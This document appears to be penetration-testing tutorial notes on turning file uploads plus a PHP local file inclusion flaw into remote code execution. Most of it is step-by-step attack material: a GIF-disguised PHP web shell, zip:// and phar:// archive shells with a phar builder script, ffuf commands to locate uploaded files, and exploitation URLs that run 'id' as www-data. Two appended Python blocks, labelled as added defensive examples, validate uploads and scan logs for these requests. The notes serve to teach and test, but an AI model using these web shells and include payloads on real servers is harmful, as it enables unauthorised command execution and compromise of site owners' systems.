FILE UPLOADS
Last updated
#image upload
The main focus here isn't the exploitation of file upload forms and functionalities, as the methods here don't require the upload form itself to be vulnerable. The only requirement is the ability to upload a file through any upload functionality (e.g., a profile image). If the vulnerable include function has code execution capabilities, the code inside the uploaded file gets executed, regardless of its extension or file type.
This method works as long as the vulnerable function allows code execution.
#step 1: create a malicious image containing a PHP web shell code that still looks and works as an image
root@oco:~$ echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
* this must use an allowed image extension and must also include the image's magic bytes at the start of the file content
- this covers the case where the upload form checks both the extension and the content type
- to use other image extensions whose magic bytes are binary, URL encoding is required
* this file on its own is completely harmless and would not affect a normal web application
- the impact is only realized when the payload is combined with an LFI vulnerability, which turns it into remote code execution.
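As an added, defender-side example that is not part of these notes: the `GIF8` trick above passes a check that compares only the first four bytes. The Python below (constructed here; the sample bytes, the helper names and the fixed `.gif` extension are assumptions) parses the full GIF structure instead, rejects any upload that contains a PHP open tag, and assigns a server-chosen random filename so the uploader never controls the stored name.

```python
import secrets
import struct

# Constructed sample: the polyglot from the notes above. It passes a check that only
# compares the first four bytes against "GIF8", but it is not a parseable GIF.
POLYGLOT = b'GIF8<?php system($_GET["cmd"]); ?>'

# Constructed sample: a structurally valid 1x1 GIF89a with no colour tables.
VALID_GIF = (
    b"GIF89a" + struct.pack("<HH", 1, 1) + b"\x00\x00\x00"   # signature + logical screen descriptor
    + b"\x2c" + struct.pack("<HHHH", 0, 0, 1, 1) + b"\x00"  # image descriptor, no local colour table
    + b"\x02"                                                # LZW minimum code size
    + b"\x02\x44\x01" + b"\x00"                              # one data sub-block, then block terminator
    + b"\x3b"                                                # trailer
)

def _skip_sub_blocks(data: bytes, pos: int) -> int:
    """Walk a chain of GIF data sub-blocks; return the offset just past the 0x00 terminator."""
    while True:
        if pos >= len(data):
            raise ValueError("truncated sub-block chain")
        size = data[pos]
        pos += 1
        if size == 0:
            return pos
        pos += size

def is_well_formed_gif(data: bytes) -> bool:
    """Parse the whole GIF: full 6-byte signature, every block, and the trailer as the final byte."""
    try:
        if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
            return False
        packed = data[10]
        pos = 13
        if packed & 0x80:                            # global colour table present
            pos += 3 * (2 << (packed & 0x07))
        while True:
            if pos >= len(data):
                return False                         # ran off the end without a trailer
            block = data[pos]
            pos += 1
            if block == 0x3B:                        # trailer: nothing may follow it
                return pos == len(data)
            if block == 0x21:                        # extension: label byte, then sub-blocks
                pos = _skip_sub_blocks(data, pos + 1)
            elif block == 0x2C:                      # image descriptor
                if pos + 9 > len(data):
                    return False
                local_packed = data[pos + 8]
                pos += 9
                if local_packed & 0x80:              # local colour table present
                    pos += 3 * (2 << (local_packed & 0x07))
                pos = _skip_sub_blocks(data, pos + 1)   # +1 skips the LZW minimum code size
            else:
                return False                         # unknown block type
    except (IndexError, ValueError):
        return False

def contains_php_open_tag(data: bytes) -> bool:
    """A file later handed to include() executes any '<?' it contains, wherever it sits."""
    return b"<?" in data

def validate_upload(data: bytes) -> bool:
    """Accept only a fully parseable GIF that carries no PHP open tag."""
    return is_well_formed_gif(data) and not contains_php_open_tag(data)

def storage_name(user_filename: str) -> str:
    """Server-chosen random name with a fixed extension; the user-supplied name is deliberately ignored."""
    return secrets.token_hex(16) + ".gif"
```

Structural parsing is defence in depth, not the fix: a valid image can still carry arbitrary text in metadata, so a stronger upload-side control is to re-encode the image with an image library. The control that actually breaks this chain is on the include side: never pass user-controlled paths to `include()`, and store uploads outside the web root under the random name returned above.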
#step 2: upload
root@oco:~$ BROWSER > http://<SERVER_IP>:<PORT>/settings.php
upload: {upload image}
#step 3: identify file path where the image was uploaded
root@oco:~$ BROWSER > http://<SERVER_IP>:<PORT>/settings.php > CTRL+U
...
<img src="/profile_images/shell.gif" class="profile-image" id="profile-image">
...
* perform a source code review to identify the file path; otherwise use fuzzing
#step 3 (alternative): fuzz for file path or extension
root@oco:~$ nano fuzznfind.txt
shell
root@oco:~$ ffuf -w fuzznfind.txt -u http://{targetSite:port}/profile_images/FUZZ -recursion -recursion-depth 1 -e .gif -v -ic -t 100
* the -recursion flag enables recursive scanning
* the -recursion-depth flag limits how deep the recursive scan goes
- this command specifically fuzzes the main directories and their immediate subdirectories
* the -e flag appends the given extension to each wordlist entry
* the -v flag enables verbose output, which prints the full URL
* the -ic flag ignores comments in the wordlist
* fuzz for an uploads directory first, then fuzz for the uploaded file within it
- this combines directory fuzzing with page fuzzing
- NOTE: this may not always work, as some web applications properly hide uploaded files.
#exploitation
root@oco:~$ BROWSER > http://<SERVER_IP>:<PORT>/index.php?language=./profile_images/shell.gif&cmd=id
GIF8uid=33(www-data) gid=33(www-data) groups=33(www-data)
* NOTE: the ./profile_images/ path is included in the URL because that is where the payload is stored. If the web app prefixes a directory before the input, use ../ to move out of the prefixed directory and then include the payload's path.
#zip upload
This method is often used when the image upload technique doesn't work. However, the zip wrapper isn't enabled by default, so it may not always work.
#step 1: create a malicious PHP web shell code
root@oco:~$ echo '<?php system($_GET["cmd"]); ?>' > shell2.php && zip shell2.jpg shell2.php
* this saves the PHP command shell as shell2.php, which is then zipped as shell2.jpg (the names match the shell2.jpg%23shell2.php reference used in the exploitation step)
* even though the zip archive is named shell2.jpg, some upload forms may still detect the file as a zip archive through content-type tests and disallow the upload, so this attack has a higher chance of working if uploading zip archives is allowed.
#step 2: upload
root@oco:~$ BROWSER > http://<SERVER_IP>:<PORT>/settings.php
upload: {upload image}
#step 3: identify file path where the image was uploaded
root@oco:~$ BROWSER > http://<SERVER_IP>:<PORT>/settings.php > CTRL+U
...
<img src="/profile_images/shell2.jpg" class="profile-image" id="profile-image">
...
* perform a source code review to identify the file path; otherwise use fuzzing
#step 3 (alternative): fuzz for file path or extension
root@oco:~$ nano fuzznfind.txt
shell2
root@oco:~$ ffuf -w fuzznfind.txt -u http://{targetSite:port}/profile_images/FUZZ -recursion -recursion-depth 1 -e .jpg -v -ic -t 100
* the -recursion flag enables recursive scanning
* the -recursion-depth flag limits how deep the recursive scan goes
- this command specifically fuzzes the main directories and their immediate subdirectories
* the -e flag appends the given extension to each wordlist entry
* the -v flag enables verbose output, which prints the full URL
* the -ic flag ignores comments in the wordlist
* fuzz for an uploads directory first, then fuzz for the uploaded file within it
- this combines directory fuzzing with page fuzzing
- NOTE: this may not always work, as some web applications properly hide uploaded files.
#exploitation
root@oco:~$ BROWSER > http://{targetSite:port}/index.php?language=zip://./profile_images/shell2.jpg%23shell2.php&cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
* NOTE: the ./profile_images/ path is included in the URL because that is where the payload is stored. If the web app prefixes a directory before the input, use ../ to move out of the prefixed directory and then include the payload's path. The %23 after the archive name is a URL-encoded #, which tells the zip:// wrapper which file inside the archive to read.
#phar upload
This method is similar to the previous ones but uses the phar:// wrapper instead.
#step 1: create a malicious PHP web shell code
root@oco:~$ nano shell3.php
<?php
// build a phar archive that carries the web shell as a sub-file named shell.txt
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
// minimal stub; __HALT_COMPILER() marks where the archive data begins
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();
?>
#run the script to produce a phar archive containing the web shell as the sub-file shell.txt (phar.readonly must be disabled for PHP to write phar files)
root@oco:~$ php --define phar.readonly=0 shell3.php
* this creates an output file named shell.phar
root@oco:~$ mv shell.phar shell3.jpg
#step 2: upload
root@oco:~$ BROWSER > http://<SERVER_IP>:<PORT>/settings.php
upload: {upload image}
#step 3: identify file path where the image was uploaded
root@oco:~$ BROWSER > http://<SERVER_IP>:<PORT>/settings.php > CTRL+U
...
<img src="/profile_images/shell3.jpg" class="profile-image" id="profile-image">
...
* perform a source code review to identify the file path; otherwise use fuzzing
#step 3 (alternative): fuzz for file path or extension
root@oco:~$ nano fuzznfind.txt
shell3
root@oco:~$ ffuf -w fuzznfind.txt -u http://{targetSite:port}/profile_images/FUZZ -recursion -recursion-depth 1 -e .jpg -v -ic -t 100
* the -recursion flag enables recursive scanning
* the -recursion-depth flag limits how deep the recursive scan goes
- this command specifically fuzzes the main directories and their immediate subdirectories
* the -e flag appends the given extension to each wordlist entry
* the -v flag enables verbose output, which prints the full URL
* the -ic flag ignores comments in the wordlist
* fuzz for an uploads directory first, then fuzz for the uploaded file within it
- this combines directory fuzzing with page fuzzing
- NOTE: this may not always work, as some web applications properly hide uploaded files.
#exploitation
root@oco:~$ BROWSER > http://<SERVER_IP>:<PORT>/index.php?language=phar://./profile_images/shell3.jpg%2Fshell.txt&cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
* use the phar:// wrapper, provide the URL path to the archive, then specify the phar sub-file with /shell.txt (URL encoded as %2Fshell.txt) to get the command output
* NOTE: the ./profile_images/ path is included in the URL because that is where the payload is stored. If the web app prefixes a directory before the input, use ../ to move out of the prefixed directory and then include the payload's path.
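Detection example covering all three variants above (plain image include, zip://, phar://) and the ../ prefix escape mentioned in each NOTE, added here and not part of the original notes: a small Python scanner over constructed access-log lines modelled on the exploitation requests. The parameter names in INCLUDE_PARAMS and the directories in UPLOAD_DIRS are assumptions about the monitored application and would be adjusted per deployment.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (combined log format, abbreviated) modelled on the three
# exploitation requests in these notes plus a benign include, a traversal attempt and a
# normal image fetch. None of this is real captured traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?language=es.php HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?language=./profile_images/shell.gif&cmd=id HTTP/1.1" 200 230
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?language=zip://./profile_images/shell2.jpg%23shell2.php&cmd=id HTTP/1.1" 200 230
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?language=phar://./profile_images/shell3.jpg%2Fshell.txt&cmd=id HTTP/1.1" 200 230
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?language=../../../../etc/passwd HTTP/1.1" 200 1800
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /profile_images/avatar.gif HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Assumption: these query parameters are the ones the application passes to include().
INCLUDE_PARAMS = {"language", "page", "file", "include"}
# Assumption: directories where user uploads land; an include() pointing here is never legitimate.
UPLOAD_DIRS = ("profile_images/", "uploads/")
WRAPPER_RE = re.compile(r"^([a-z0-9.+-]+)://", re.I)

def analyse_request(target: str) -> list:
    """Return finding labels for one request target (path plus query string)."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    findings = []
    for param, values in qs.items():
        if param not in INCLUDE_PARAMS:
            continue
        for raw in values:
            value = unquote(raw)        # parse_qs decoded once; a second pass catches double-encoding
            m = WRAPPER_RE.match(value)
            if m:                       # zip://, phar://, php:// and similar stream wrappers
                findings.append("stream_wrapper:" + m.group(1).lower())
            if any(d in value for d in UPLOAD_DIRS):
                findings.append("include_from_upload_dir")
            if "../" in value:
                findings.append("path_traversal")
    if findings and "cmd" in qs:        # include of attacker content plus a command parameter
        findings.append("command_param")
    return findings

def scan_log(text: str) -> list:
    """Parse each log line and keep those with findings as (ip, target, status, findings)."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyse_request(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("target"), m.group("status"), findings))
    return hits

if __name__ == "__main__":
    for ip, target, status, findings in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {target}\n    {', '.join(findings)}")
```

The strongest signal is the combination: an include parameter that references an upload directory or a stream wrapper, in the same request as a `cmd` parameter, returning HTTP 200. On its own, `include_from_upload_dir` is the alert worth paging on, since no legitimate code path should ever include a file from a directory that users write to.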